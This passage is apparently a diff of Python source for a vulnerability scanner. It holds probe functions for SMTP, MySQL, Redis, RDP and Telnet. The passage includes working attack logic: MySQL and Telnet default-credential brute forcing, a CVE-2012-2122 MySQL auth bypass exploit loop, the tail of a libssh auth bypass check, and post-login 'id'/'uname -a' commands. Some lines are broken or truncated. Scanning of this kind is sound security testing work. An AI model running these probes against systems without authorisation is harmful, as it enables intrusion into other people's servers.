chan.close() - transport.close() - return Finding( - severity=Severity.CRITICAL, - title="libssh auth bypass (CVE-2018-10933)", - description="Server accepted SSH2_MSG_USERAUTH_SUCCESS from client, " - "bypassing authentication entirely. Full shell access possible.", - evidence="Session channel opened after sending USERAUTH_SUCCESS.", - remediation="Upgrade libssh to >= 0.8.4 or >= 0.7.6.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - ) - except Exception: - pass - transport.close() - except Exception as e: - self.P(f"libssh bypass check failed on {target}:{port}: {e}", color='y') - return None - - def _service_info_smtp(self, target, port): # default port: 25 - """ - Assess SMTP service security: banner, EHLO features, STARTTLS, - authentication methods, open relay, and user enumeration. - - Checks performed (in order): - - 1. Banner grab — fingerprint MTA software and version. - 2. EHLO — enumerate server capabilities (SIZE, AUTH, STARTTLS, etc.). - 3. STARTTLS support — check for encryption. - 4. AUTH methods — detect available authentication mechanisms. - 5. Open relay test — attempt MAIL FROM / RCPT TO without auth. - 6. VRFY / EXPN — test user enumeration commands. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import smtplib - - findings = [] - result = { - "banner": None, - "server_hostname": None, - "max_message_size": None, - "auth_methods": [], - } - - # --- 1. Connect and grab banner --- - try: - smtp = smtplib.SMTP(timeout=5) - code, msg = smtp.connect(target, port) - result["banner"] = f"{code} {msg.decode(errors='replace')}" - except Exception as e: - return probe_error(target, port, "SMTP", e) - - # --- 2. EHLO — server capabilities --- - identity = getattr(self, 'scanner_identity', 'probe.redmesh.local') - ehlo_features = [] - try: - code, msg = smtp.ehlo(identity) - if code == 250: - for line in msg.decode(errors="replace").split("\n"): - feat = line.strip() - if feat: - ehlo_features.append(feat) - except Exception: - # Fallback to HELO - try: - smtp.helo(identity) - except Exception: - pass - - # Parse meaningful fields from EHLO response - for idx, feat in enumerate(ehlo_features): - upper = feat.upper() - if idx == 0 and " Hello " in feat: - # First line is the server greeting: "hostname Hello client [ip]" - result["server_hostname"] = feat.split()[0] - if upper.startswith("SIZE "): - try: - size_bytes = int(feat.split()[1]) - result["max_message_size"] = f"{size_bytes // (1024*1024)}MB" - except (ValueError, IndexError): - pass - if upper.startswith("AUTH "): - result["auth_methods"] = feat.split()[1:] - - # --- 2b. Banner timezone extraction --- - banner_text = result["banner"] or "" - _tz_match = _re.search(r'([+-]\d{4})\s*$', banner_text) - if _tz_match: - self._emit_metadata("timezone_hints", {"offset": _tz_match.group(1), "source": f"smtp:{port}"}) - - # --- 2c. Banner / hostname information disclosure --- - # Extract MTA version from banner (e.g. "Exim 4.97", "Postfix", "Sendmail 8.x") - version_match = _re.search( - r"(Exim|Postfix|Sendmail|Microsoft ESMTP|hMailServer|Haraka|OpenSMTPD)" - r"[\s/]*([0-9][0-9.]*)?", - banner_text, _re.IGNORECASE, - ) - if version_match: - mta = version_match.group(0).strip() - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP banner discloses MTA software: {mta} (aids CVE lookup).", - description="The SMTP banner reveals the mail transfer agent software and version.", - evidence=f"Banner: {banner_text[:120]}", - remediation="Remove or genericize the SMTP banner to hide MTA version details.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - - # CVE check on extracted MTA version - _smtp_product_map = {'exim': 'exim', 'postfix': 'postfix', 'opensmtpd': 'opensmtpd'} - _mta_version = version_match.group(2) if version_match and version_match.group(2) else None - _mta_name = version_match.group(1).lower() if version_match else None - - # If banner lacks version (common with OpenSMTPD), try HELP command - if version_match and not _mta_version: - try: - code, msg = smtp.docmd("HELP") - help_text = msg.decode(errors="replace") if isinstance(msg, bytes) else str(msg) - _help_ver = _re.search(r'(\d+\.\d+(?:\.\d+)*(?:p\d+)?)', help_text) - if _help_ver: - _mta_version = _help_ver.group(1) - except Exception: - pass - - if _mta_name and _mta_version: - _cve_product = _smtp_product_map.get(_mta_name) - if _cve_product: - findings += check_cves(_cve_product, _mta_version) - - if result["server_hostname"]: - # Check if hostname reveals container/internal info - hostname = result["server_hostname"] - if _re.search(r"[0-9a-f]{12}", hostname): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname leaks container ID: {hostname} (infrastructure disclosure).", - description="The EHLO response reveals a container ID or internal hostname.", - evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a proper FQDN instead of the container ID.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - if _re.match(r'^[a-z0-9-]+-[a-z0-9]{8,10}$', hostname): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_k8s:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname matches Kubernetes pod name pattern: {hostname}", - description="The EHLO hostname resembles a Kubernetes pod name (deployment-replicaset-podid).", - evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a proper FQDN instead of the pod name.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - if hostname.endswith('.internal'): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_internal:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname uses cloud-internal DNS suffix: {hostname}", - description="The EHLO hostname ends with '.internal', indicating AWS/GCP internal DNS.", - evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a public FQDN instead of internal DNS.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - - # --- 3. STARTTLS --- - starttls_supported = any("STARTTLS" in f.upper() for f in ehlo_features) - if not starttls_supported: - try: - code, msg = smtp.docmd("STARTTLS") - if code == 220: - starttls_supported = True - except Exception: - pass - - if not starttls_supported: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMTP does not support STARTTLS (credentials sent in cleartext).", - description="The SMTP server does not offer STARTTLS, leaving credentials and mail unencrypted.", - evidence="STARTTLS not listed in EHLO features and STARTTLS command rejected.", - remediation="Enable STARTTLS support on the SMTP server.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 4. AUTH without credentials --- - if result["auth_methods"]: - try: - code, msg = smtp.docmd("AUTH LOGIN") - if code == 235: - findings.append(Finding( - severity=Severity.HIGH, - title="SMTP AUTH LOGIN accepted without credentials.", - description="The SMTP server accepted AUTH LOGIN without providing actual credentials.", - evidence=f"AUTH LOGIN returned code {code}.", - remediation="Fix AUTH configuration to require valid credentials.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - except Exception: - pass - - # --- 5. Open relay test --- - try: - smtp.rset() - except Exception: - try: - smtp.quit() - except Exception: - pass - try: - smtp = smtplib.SMTP(target, port, timeout=5) - smtp.ehlo(identity) - except Exception: - smtp = None - - if smtp: - try: - code_from, _ = smtp.docmd(f"MAIL FROM:") - if code_from == 250: - code_rcpt, _ = smtp.docmd("RCPT TO:") - if code_rcpt == 250: - findings.append(Finding( - severity=Severity.HIGH, - title="SMTP open relay detected (accepts mail to external domains without auth).", - description="The SMTP server relays mail to external domains without authentication.", - evidence="RCPT TO: accepted (code 250).", - remediation="Configure SMTP relay restrictions to require authentication.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - smtp.docmd("RSET") - except Exception: - pass - - # --- 6. VRFY / EXPN --- - if smtp: - for cmd_name in ("VRFY", "EXPN"): - try: - code, msg = smtp.docmd(cmd_name, "root") - if code in (250, 251, 252): - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SMTP {cmd_name} command enabled (user enumeration possible).", - description=f"The {cmd_name} command can be used to enumerate valid users on the system.", - evidence=f"{cmd_name} root returned code {code}.", - remediation=f"Disable the {cmd_name} command in the SMTP server configuration.", - owasp_id="A01:2021", - cwe_id="CWE-203", - confidence="certain", - )) - except Exception: - pass - - if smtp: - try: - smtp.quit() - except Exception: - pass - - return probe_result(raw_data=result, findings=findings) - - def _service_info_mysql(self, target, port): # default port: 3306 - """ - MySQL handshake probe: extract version, auth plugin, and check CVEs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"version": None, "auth_plugin": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - sock.close() - - if data and len(data) > 4: - # MySQL protocol: first byte of payload is protocol version (0x0a = v10) - pkt_payload = data[4:] # skip 3-byte length + 1-byte seq - if pkt_payload and pkt_payload[0] == 0x0a: - version = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') - raw["version"] = version - - # Extract auth plugin name (at end of handshake after capabilities/salt) - try: - parts = pkt_payload.split(b'\x00') - if len(parts) >= 2: - last = parts[-2].decode('utf-8', errors='ignore') if parts[-1] == b'' else parts[-1].decode('utf-8', errors='ignore') - if 'mysql_native' in last or 'caching_sha2' in last or 'sha256' in last: - raw["auth_plugin"] = last - except Exception: - pass - - findings.append(Finding( - severity=Severity.LOW, - title=f"MySQL version disclosed: {version}", - description=f"MySQL {version} handshake received on {target}:{port}.", - evidence=f"version={version}, auth_plugin={raw['auth_plugin']}", - remediation="Restrict MySQL to trusted networks; consider disabling version disclosure.", - confidence="certain", - )) - - # Salt entropy check — extract 20-byte auth scramble from handshake - try: - import math - # After version null-terminated string: 4 bytes thread_id + 8 bytes salt1 - after_version = pkt_payload[1:].split(b'\x00', 1)[1] - if len(after_version) >= 12: - salt1 = after_version[4:12] # 8 bytes after thread_id - # Salt part 2: after capabilities(2)+charset(1)+status(2)+caps_upper(2)+auth_len(1)+reserved(10) - salt2 = b'' - if len(after_version) >= 31: - salt2 = after_version[31:43].rstrip(b'\x00') - full_salt = salt1 + salt2 - if len(full_salt) >= 8: - # Shannon entropy - byte_counts = {} - for b in full_salt: - byte_counts[b] = byte_counts.get(b, 0) + 1 - entropy = 0.0 - n = len(full_salt) - for count in byte_counts.values(): - p = count / n - if p > 0: - entropy -= p * math.log2(p) - raw["salt_entropy"] = round(entropy, 2) - if entropy < 2.0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"MySQL salt entropy critically low ({entropy:.2f} bits)", - description="The authentication scramble has abnormally low entropy, " - "suggesting a non-standard or deceptive MySQL service.", - evidence=f"salt_entropy={entropy:.2f}, salt_hex={full_salt.hex()[:40]}", - remediation="Investigate this MySQL instance — authentication randomness is insufficient.", - cwe_id="CWE-330", - confidence="firm", - )) - except Exception: - pass - - # CVE check - findings += check_cves("mysql", version) - else: - raw["protocol_byte"] = pkt_payload[0] if pkt_payload else None - findings.append(Finding( - severity=Severity.INFO, - title="MySQL port open (non-standard handshake)", - description=f"Port {port} responded but protocol byte is not 0x0a.", - confidence="tentative", - )) - else: - findings.append(Finding( - severity=Severity.INFO, - title="MySQL port open (no banner)", - description=f"No handshake data received on {target}:{port}.", - confidence="tentative", - )) - except Exception as e: - return probe_error(target, port, "MySQL", e) - - return probe_result(raw_data=raw, findings=findings) - - def _service_info_mysql_creds(self, target, port): # default port: 3306 - """ - MySQL default credential testing (opt-in via active_auth feature group). - - Attempts mysql_native_password auth with a small list of default credentials. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import hashlib - - findings = [] - raw = {"tested_credentials": 0, "accepted_credentials": []} - creds = [("root", ""), ("root", "root"), ("root", "password")] - - for username, password in creds: - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - - if not data or len(data) < 4: - sock.close() - continue - - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - sock.close() - continue - - # Extract salt (scramble) from handshake - parts = pkt_payload[1:].split(b'\x00', 1) - rest = parts[1] if len(parts) > 1 else b'' - # Salt part 1: bytes 4..11 after capabilities (skip 4 bytes capabilities + 1 byte filler) - if len(rest) >= 13: - salt1 = rest[5:13] - else: - sock.close() - continue - # Salt part 2: after reserved bytes (skip 2+2+1+10 reserved = 15) - salt2 = b'' - if len(rest) >= 28: - salt2 = rest[28:40].rstrip(b'\x00') - salt = salt1 + salt2 - - # mysql_native_password auth response - if password: - sha1_pass = hashlib.sha1(password.encode()).digest() - sha1_sha1 = hashlib.sha1(sha1_pass).digest() - sha1_salt_sha1sha1 = hashlib.sha1(salt + sha1_sha1).digest() - auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt_sha1sha1)) - else: - auth_data = b'' - - # Build auth response packet - client_flags = struct.pack('= 5: - resp_type = resp[4] - if resp_type == 0x00: # OK packet - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"MySQL default credential accepted: {cred_str}", - description=f"MySQL on {target}:{port} accepts {cred_str}.", - evidence=f"Auth response OK for {cred_str}", - remediation="Change default passwords and restrict access.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - except Exception: - continue - - if not findings: - findings.append(Finding( - severity=Severity.INFO, - title="MySQL default credentials rejected", - description=f"Tested {raw['tested_credentials']} credential pairs, all rejected.", - confidence="certain", - )) - - # --- CVE-2012-2122 auth bypass test --- - # Affected: MySQL 5.1.x < 5.1.63, 5.5.x < 5.5.25, MariaDB < 5.5.23 - # Bug: memcmp return value truncation means ~1/256 chance of auth bypass - cve_bypass = self._mysql_test_cve_2012_2122(target, port) - if cve_bypass: - findings.append(cve_bypass) - raw["cve_2012_2122"] = True - - return probe_result(raw_data=raw, findings=findings) - - # Affected version ranges for CVE-2012-2122 - _MYSQL_CVE_2012_2122_RANGES = [ - ((5, 1, 0), (5, 1, 63)), # MySQL 5.1.x < 5.1.63 - ((5, 5, 0), (5, 5, 25)), # MySQL 5.5.x < 5.5.25 - ] - - def _mysql_test_cve_2012_2122(self, target, port): - """Test for MySQL CVE-2012-2122 timing-based authentication bypass. - - On affected versions, memcmp() return value is cast to char, giving - a ~1/256 chance that any password is accepted. 300 attempts gives - ~69% probability of detection. - - Returns - ------- - Finding or None - CRITICAL finding if bypass confirmed, None otherwise. - """ - import hashlib - - # First, connect to get version - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - sock.close() - except Exception: - return None - - if not data or len(data) < 5: - return None - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - return None - - version_str = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') - version_tuple = tuple(int(x) for x in _re.findall(r'\d+', version_str)[:3]) - if len(version_tuple) < 3: - return None - - # Check if version is in affected range - affected = False - for low, high in self._MYSQL_CVE_2012_2122_RANGES: - if low <= version_tuple < high: - affected = True - break - if not affected: - return None - - # Attempt rapid auth with random passwords - self.P(f"MySQL {version_str} in CVE-2012-2122 range — testing auth bypass ({target}:{port})", color='y') - attempts = 300 - - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - - for _ in range(attempts): - # Read handshake - data = sock.recv(512) - if not data or len(data) < 5: - break - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - break - - # Extract salt - parts = pkt_payload[1:].split(b'\x00', 1) - rest = parts[1] if len(parts) > 1 else b'' - if len(rest) < 13: - break - salt1 = rest[5:13] - salt2 = rest[28:40].rstrip(b'\x00') if len(rest) >= 28 else b'' - salt = salt1 + salt2 - - # Auth with random password - rand_pass = random.randbytes(20) - sha1_pass = hashlib.sha1(rand_pass).digest() - sha1_sha1 = hashlib.sha1(sha1_pass).digest() - sha1_salt = hashlib.sha1(salt + sha1_sha1).digest() - auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt)) - - client_flags = struct.pack('= 5 and resp[4] == 0x00: - sock.close() - return Finding( - severity=Severity.CRITICAL, - title=f"MySQL authentication bypass confirmed (CVE-2012-2122)", - description=f"MySQL {version_str} on {target}:{port} accepted login with a random password " - "due to CVE-2012-2122 memcmp truncation bug. Any attacker can gain root access.", - evidence=f"Auth succeeded with random password on attempt (version {version_str})", - remediation="Upgrade MySQL to at least 5.1.63 / 5.5.25 / MariaDB 5.5.23.", - owasp_id="A07:2021", - cwe_id="CWE-305", - confidence="certain", - ) - - # If error packet, server closes connection — reconnect - if resp and len(resp) >= 5 and resp[4] == 0xFF: - sock.close() - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - sock.close() - except Exception: - pass - return None - - def _service_info_rdp(self, target, port): # default port: 3389 - """ - Verify reachability of RDP services without full negotiation. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - raw["banner"] = "RDP service open" - findings.append(Finding( - severity=Severity.INFO, - title="RDP service detected", - description=f"RDP port {port} is open on {target}, no further enumeration performed.", - evidence=f"TCP connect to {target}:{port} succeeded.", - confidence="certain", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "RDP", e) - return probe_result(raw_data=raw, findings=findings) - - # SAFETY: Read-only commands only. NEVER add CONFIG SET, SLAVEOF, MODULE LOAD, EVAL, DEBUG. - def _service_info_redis(self, target, port): # default port: 6379 - """ - Deep Redis probe: auth check, version, config readability, data size, client list. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings, raw = [], {"version": None, "os": None, "config_writable": False} - sock = self._redis_connect(target, port) - if not sock: - return probe_error(target, port, "Redis", Exception("connection failed")) - - auth_findings = self._redis_check_auth(sock, raw) - if not auth_findings: - # NOAUTH response — requires auth, stop here - sock.close() - return probe_result( - raw_data=raw, - findings=[Finding(Severity.INFO, "Redis requires authentication", "PING returned NOAUTH.")], - ) - - findings += auth_findings - findings += self._redis_check_info(sock, raw) - findings += self._redis_check_config(sock, raw) - findings += self._redis_check_data(sock, raw) - findings += self._redis_check_clients(sock, raw) - findings += self._redis_check_persistence(sock, raw) - - # CVE check - if raw["version"]: - findings += check_cves("redis", raw["version"]) - - sock.close() - return probe_result(raw_data=raw, findings=findings) - - def _redis_connect(self, target, port): - """Open a TCP socket to Redis.""" - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - return sock - except Exception as e: - self.P(f"Redis connect failed on {target}:{port}: {e}", color='y') - return None - - def _redis_cmd(self, sock, cmd): - """Send an inline Redis command and return the response string.""" - try: - sock.sendall(f"{cmd}\r\n".encode()) - data = sock.recv(4096).decode('utf-8', errors='ignore') - return data - except Exception: - return "" - - def _redis_check_auth(self, sock, raw): - """PING to check if auth is required. Returns findings if no auth, empty list if NOAUTH.""" - resp = self._redis_cmd(sock, "PING") - if resp.startswith("+PONG"): - return [Finding( - severity=Severity.CRITICAL, - title="Redis unauthenticated access", - description="Redis responded to PING without authentication.", - evidence=f"Response: {resp.strip()[:80]}", - remediation="Set a strong password via requirepass in redis.conf.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )] - if "-NOAUTH" in resp.upper(): - return [] # signal: auth required - return [Finding( - severity=Severity.LOW, - title="Redis unusual PING response", - description=f"Unexpected response: {resp.strip()[:80]}", - confidence="tentative", - )] - - def _redis_check_info(self, sock, raw): - """Extract version and OS from INFO server.""" - findings = [] - resp = self._redis_cmd(sock, "INFO server") - if resp.startswith("-"): - return findings - uptime_seconds = None - for line in resp.split("\r\n"): - if line.startswith("redis_version:"): - raw["version"] = line.split(":", 1)[1].strip() - elif line.startswith("os:"): - raw["os"] = line.split(":", 1)[1].strip() - elif line.startswith("uptime_in_seconds:"): - try: - uptime_seconds = int(line.split(":", 1)[1].strip()) - raw["uptime_seconds"] = uptime_seconds - except (ValueError, IndexError): - pass - if raw["os"]: - self._emit_metadata("os_claims", "redis", raw["os"]) - if raw["version"]: - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis version disclosed: {raw['version']}", - description=f"Redis {raw['version']} on {raw['os'] or 'unknown OS'}.", - evidence=f"version={raw['version']}, os={raw['os']}", - remediation="Restrict INFO command access or rename it.", - confidence="certain", - )) - if uptime_seconds is not None and uptime_seconds < 60: - findings.append(Finding( - severity=Severity.INFO, - title=f"Redis uptime <60s ({uptime_seconds}s) — possible container restart", - description="Very low uptime may indicate a recently restarted container or ephemeral instance.", - evidence=f"uptime_in_seconds={uptime_seconds}", - remediation="Investigate if the service is being automatically restarted.", - confidence="tentative", - )) - return findings - - def _redis_check_config(self, sock, raw): - """CONFIG GET dir — if accessible, it's an RCE vector.""" - findings = [] - resp = self._redis_cmd(sock, "CONFIG GET dir") - if resp.startswith("-"): - return findings # blocked, good - raw["config_writable"] = True - findings.append(Finding( - severity=Severity.CRITICAL, - title="Redis CONFIG command accessible (RCE vector)", - description="CONFIG GET is accessible, allowing attackers to write arbitrary files " - "via CONFIG SET dir / CONFIG SET dbfilename + SAVE.", - evidence=f"CONFIG GET dir response: {resp.strip()[:120]}", - remediation="Rename or disable CONFIG via rename-command in redis.conf.", - owasp_id="A05:2021", - cwe_id="CWE-94", - confidence="certain", - )) - return findings - - def _redis_check_data(self, sock, raw): - """DBSIZE — report if data is present.""" - findings = [] - resp = self._redis_cmd(sock, "DBSIZE") - if resp.startswith(":"): - try: - count = int(resp.strip().lstrip(":")) - raw["db_size"] = count - if count > 0: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Redis database contains {count} keys", - description="Unauthenticated access to a Redis instance with live data.", - evidence=f"DBSIZE={count}", - remediation="Enable authentication and restrict network access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except ValueError: - pass - return findings - - def _redis_check_clients(self, sock, raw): - """CLIENT LIST — extract connected client IPs.""" - findings = [] - resp = self._redis_cmd(sock, "CLIENT LIST") - if resp.startswith("-"): - return findings - ips = set() - for line in resp.split("\n"): - for part in line.split(): - if part.startswith("addr="): - ip_port = part.split("=", 1)[1] - ip = ip_port.rsplit(":", 1)[0] - ips.add(ip) - if ips: - raw["connected_clients"] = list(ips) - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis client IPs disclosed ({len(ips)} clients)", - description=f"CLIENT LIST reveals connected IPs: {', '.join(sorted(ips)[:5])}", - evidence=f"IPs: {', '.join(sorted(ips)[:10])}", - remediation="Rename or disable CLIENT command.", - confidence="certain", - )) - return findings - - def _redis_check_persistence(self, sock, raw): - """Check INFO persistence for missing or stale RDB saves.""" - findings = [] - resp = self._redis_cmd(sock, "INFO persistence") - if resp.startswith("-"): - return findings - import time as _time - for line in resp.split("\r\n"): - if line.startswith("rdb_last_bgsave_time:"): - try: - ts = int(line.split(":", 1)[1].strip()) - if ts == 0: - findings.append(Finding( - severity=Severity.LOW, - title="Redis has never performed an RDB save", - description="rdb_last_bgsave_time is 0, meaning no background save has ever been performed. " - "This may indicate a cache-only instance with persistence disabled, or an ephemeral deployment.", - evidence="rdb_last_bgsave_time=0", - remediation="Verify whether RDB persistence is intentionally disabled; if not, configure BGSAVE.", - cwe_id="CWE-345", - confidence="tentative", - )) - elif (_time.time() - ts) > 365 * 86400: - age_days = int((_time.time() - ts) / 86400) - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis RDB save is stale ({age_days} days old)", - description="The last RDB background save timestamp is over 1 year old. " - "This may indicate disabled persistence, a long-running cache-only instance, or stale data.", - evidence=f"rdb_last_bgsave_time={ts}, age={age_days}d", - remediation="Verify persistence configuration; stale saves may indicate data loss risk.", - cwe_id="CWE-345", - confidence="tentative", - )) - except (ValueError, IndexError): - pass - break - return findings - - - def _service_info_telnet(self, target, port): # default port: 23 - """ - Assess Telnet service security: banner, negotiation options, default - credentials, privilege level, system fingerprint, and credential validation. - - Checks performed (in order): - - 1. Banner grab and IAC option parsing. - 2. Default credential check — try common user:pass combos. - 3. Privilege escalation check — report if root shell is obtained. - 4. System fingerprint — run ``id`` and ``uname -a`` on successful login. - 5. Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import time as _time - - findings = [] - result = { - "banner": None, - "negotiation_options": [], - "accepted_credentials": [], - "system_info": None, - } - - findings.append(Finding( - severity=Severity.MEDIUM, - title="Telnet service is running (unencrypted remote access).", - description="Telnet transmits all data including credentials in cleartext.", - evidence=f"Telnet port {port} is open on {target}.", - remediation="Replace Telnet with SSH for encrypted remote access.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 1. Banner grab + IAC negotiation parsing --- - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - raw = sock.recv(2048) - sock.close() - except Exception as e: - return probe_error(target, port, "Telnet", e) - - # Parse IAC sequences - iac_options = [] - cmd_names = {251: "WILL", 252: "WONT", 253: "DO", 254: "DONT"} - opt_names = { - 0: "BINARY", 1: "ECHO", 3: "SGA", 5: "STATUS", - 24: "TERMINAL_TYPE", 31: "WINDOW_SIZE", 32: "TERMINAL_SPEED", - 33: "REMOTE_FLOW", 34: "LINEMODE", 36: "ENVIRON", 39: "NEW_ENVIRON", - } - i = 0 - text_parts = [] - while i < len(raw): - if raw[i] == 0xFF and i + 2 < len(raw): - cmd = cmd_names.get(raw[i + 1], f"CMD_{raw[i+1]}") - opt = opt_names.get(raw[i + 2], f"OPT_{raw[i+2]}") - iac_options.append(f"{cmd} {opt}") - i += 3 - else: - if 32 <= raw[i] < 127: - text_parts.append(chr(raw[i])) - i += 1 - - banner_text = "".join(text_parts).strip() - if banner_text: - result["banner"] = banner_text - elif iac_options: - result["banner"] = "(IAC negotiation only, no text banner)" - else: - result["banner"] = "(no banner)" - result["negotiation_options"] = iac_options - - # --- 2–4. Default credential check with system fingerprint --- - def _try_telnet_login(user, passwd): - """Attempt Telnet login, return (success, uid_line, uname_line).""" - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(5) - s.connect((target, port)) - - # Read until login prompt - buf = b"" - deadline = _time.time() + 5 - while _time.time() < deadline: - try: - chunk = s.recv(1024) - if not chunk: - break - buf += chunk - if b"login:" in buf.lower() or b"username:" in buf.lower(): - break - except socket.timeout: - break - - if b"login:" not in buf.lower() and b"username:" not in buf.lower(): - s.close() - return False, None, None - - s.sendall(user.encode() + b"\n") - - # Read until password prompt - buf = b"" - deadline = _time.time() + 5 - while _time.time() < deadline: - try: - chunk = s.recv(1024) - if not chunk: - break - buf += chunk - if b"assword:" in buf: - break - except socket.timeout: - break - - if b"assword:" not in buf: - s.close() - return False, None, None - - s.sendall(passwd.encode() + b"\n") - _time.sleep(1.5) - - # Read response - resp = b"" - try: - while True: - chunk = s.recv(4096) - if not chunk: - break - resp += chunk - except socket.timeout: - pass - - resp_text = resp.decode("utf-8", errors="replace") - - # Check for login failure indicators - fail_indicators = ["incorrect", "failed", "denied", "invalid", "login:"] - if any(ind in resp_text.lower() for ind in fail_indicators): - s.close() - return False, None, None - - # Login succeeded — try to get system info - uid_line = None - uname_line = None - try: - s.sendall(b"id\n") - _time.sleep(0.5) - id_resp = s.recv(2048).decode("utf-8", errors="replace") - for line in id_resp.replace("\r\n", "\n").split("\n"): - cleaned = line.strip() - # Remove ANSI/control sequences - import re - cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) - if "uid=" in cleaned: - uid_line = cleaned - break - except Exception: - pass - - try: - s.sendall(b"uname -a\n") - _time.sleep(0.5) - uname_resp = s.recv(2048).decode("utf-8", errors="replace") - for line in uname_resp.replace("\r\n", "\n").split("\n"): - cleaned = line.strip() - import re - cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) - if "linux" in cleaned.lower() or "unix" in cleaned.lower() or "darwin" in cleaned.lower(): - uname_line = cleaned - break - except Exception: - pass - - s.close() - return True, uid_line, uname_line - - except Exception: - return False, None, None - - system_info_captured = False - for user, passwd in _TELNET_DEFAULT_CREDS: - success, uid_line, uname_line = _try_telnet_login(user, passwd) - if success: - result["accepted_credentials"].append(f"{user}:{passwd}") - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Telnet default credential accepted: {user}:{passwd}", - description="The Telnet server accepted a well-known default credential.", - evidence=f"Accepted credential: {user}:{passwd}", - remediation="Change default passwords immediately and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - # Check for root access - if uid_line and "uid=0" in uid_line: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Root shell access via Telnet with {user}:{passwd}.", - description="Root-level shell access was obtained over an unencrypted Telnet session.", - evidence=f"uid=0 in id output: {uid_line}", - remediation="Disable root login via Telnet; use SSH with key-based auth instead.", - owasp_id="A07:2021", - cwe_id="CWE-250", - confidence="certain", - )) - - # Capture system info once - if not system_info_captured and (uid_line or uname_line): - parts = [] - if uid_line: - parts.append(uid_line) - if uname_line: - parts.append(uname_line) - result["system_info"] = " | ".join(parts) - system_info_captured = True - - # --- 5. Arbitrary credential acceptance test --- - import string as _string - ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) - rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) - success, _, _ = _try_telnet_login(ruser, rpass) - if success: - findings.append(Finding( - severity=Severity.CRITICAL, - title="Telnet accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {ruser}:{rpass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - 